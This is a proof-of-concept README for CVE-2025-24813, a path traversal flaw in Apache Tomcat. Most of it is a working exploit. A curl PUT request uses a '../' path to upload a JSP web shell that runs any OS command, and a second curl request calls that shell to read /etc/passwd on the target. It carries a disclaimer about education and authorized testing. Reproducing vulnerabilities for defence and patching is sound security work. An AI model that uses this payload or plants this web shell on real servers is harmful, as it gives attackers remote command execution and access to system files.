CVE-2025-24813 PoC — Apache Tomcat 环境问题漏洞

介绍

# CVE-2025-24813 - Apache Tomcat Path Equivalence Vulnerability

Apache Tomcat is vulnerable to a **Path Equivalence / Path Traversal** issue due to improper handling of `../` sequences in paths.  
**CVE ID:** CVE-2025-24813  
- **Severity:** Critical  

**Reference link:** https://github.com/advisories/GHSA-83qj-6fr2-vhqg

---

### PoC Steps:

**1. Send a `curl` request with a PUT method:**

```bash
curl -X PUT "http://target.com/uploads/../webapps/ROOT/updates.jsp" \
  -H "Content-Type: application/x-jsp" \
  --data-raw '<%@ page import="java.io.*" %>
<html><body>
<form method="GET"><input type="text" name="cmd"><input type="submit" value="Run"></form>
<% if(request.getParameter("cmd") != null) {
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
String l; while((l=r.readLine())!=null){ out.println(l+"<br>"); } } %>
</body></html>' -i
```
![image](https://github.com/user-attachments/assets/54f1ad0a-8788-4aed-9a4a-bc0df9eaad30)

**2. Access the uploaded file directly:**

```bash
curl "http://target.com/updates.jsp?cmd=cat/etc/passwd" -i
```
![image](https://github.com/user-attachments/assets/640f4566-c7f0-4e74-90fe-e650619345d8)

---

This repository is created for educational purposes and authorized testing only.  
**Unauthorized use against systems without explicit permission is illegal.**

---

文件快照

备注